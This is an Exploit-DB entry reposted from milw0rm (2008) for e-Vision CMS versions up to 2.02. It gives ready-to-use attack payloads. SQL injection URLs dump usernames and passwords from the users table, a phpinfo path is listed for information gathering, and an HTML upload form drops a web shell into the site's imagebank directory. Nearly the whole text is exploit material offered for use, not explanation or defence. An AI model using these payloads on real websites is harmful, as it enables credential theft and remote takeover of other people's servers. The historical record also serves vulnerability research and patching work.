e-vision CMS <= 2.02 sql/upload/ig Multiple Vulnerabilities

2008-08-02T00:00:00
ID EDB-ID:6191
Type exploitdb
Reporter Khashayar Fereidani
Modified 2008-08-02T00:00:00

Description

e-Vision CMS <= 2.02 (SQL/Upload/IG) Multiple Remote Vulnerabilities. CVE-2006-5016,CVE-2008-0856. Webapps exploit for php platform

                                        
                                            #####################################################################################
####              eVision 2.0 Sql Injection/Remote File Upload/IG                ####
#####################################################################################
#                                                                                   #
#AUTHOR : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                                      #
#Discovered by : IRCRASH (R3d.W0rm (Sina Yazdanmehr))                               #
#Our Site : Http://IRCRASH.COM                                                      #
#IRCRASH Team Members : Dr.Crash - R3d.w0rm (Sina Yazdanmehr)                       #
#####################################################################################
#                                                                                   #
#Script Download : http://mesh.dl.sourceforge.net/sourceforge/e-vision/eVision-2.0.tar.gz
#                                                                                   #
#DORK :  :(                                                                           #
#                                                                                   #
#####################################################################################
#                                [Sql Injection]                                    #
#                                                                                   #
#Blind : http://Site/print.php?id=1'+and+1=1/*                                      #
#http://Site/style.php?template=1&module='+union+select+concat_ws(0x7c,username,pass)+from+users/*
#User : http://Site/iframe.php?field=username&module=users/*                        #
#Pass : http://Site/iframe.php?field=pass&module=users/*                            #
#                                     [IG]                                          #
#http://Site/admin/phpinfo.php                                                      #
#                                                                                   #
#                               [Remote File Upload]                                #
#Exploit :                                                                          #
#                                                                                   #
#&lt;html&gt;                                                                             #
#&lt;!--                                                                               #
#Powered by : IrCrash (R3d.W0rm(Sina Yazdanmehr))                                   # 
#Http://IrCrash.Com                                                                 #
#//--&gt;                                                                              #
#&lt;form action='http://[Site]/admin/x_image.php?type=background' method=post enctype=multipart/form-data&gt;
#&lt;input type=file name='file_upload'&gt;                                               #
#&lt;input type=hidden name=insert value=1&gt;                                            #
#&lt;input type=hidden name=s_rc value='file://'&gt;                                      #
#&lt;input type=submit&gt;                                                                #
#&lt;/form&gt;                                                                            #
#&lt;/html&gt;                                                                            #
#Your shell save in http://Site/imagebank/                                          #
#                                                                                   #
#####################################################################################
#                           Site : Http://IRCRASH.COM                               #
###################################### TNX GOD ######################################

# milw0rm.com [2008-08-02]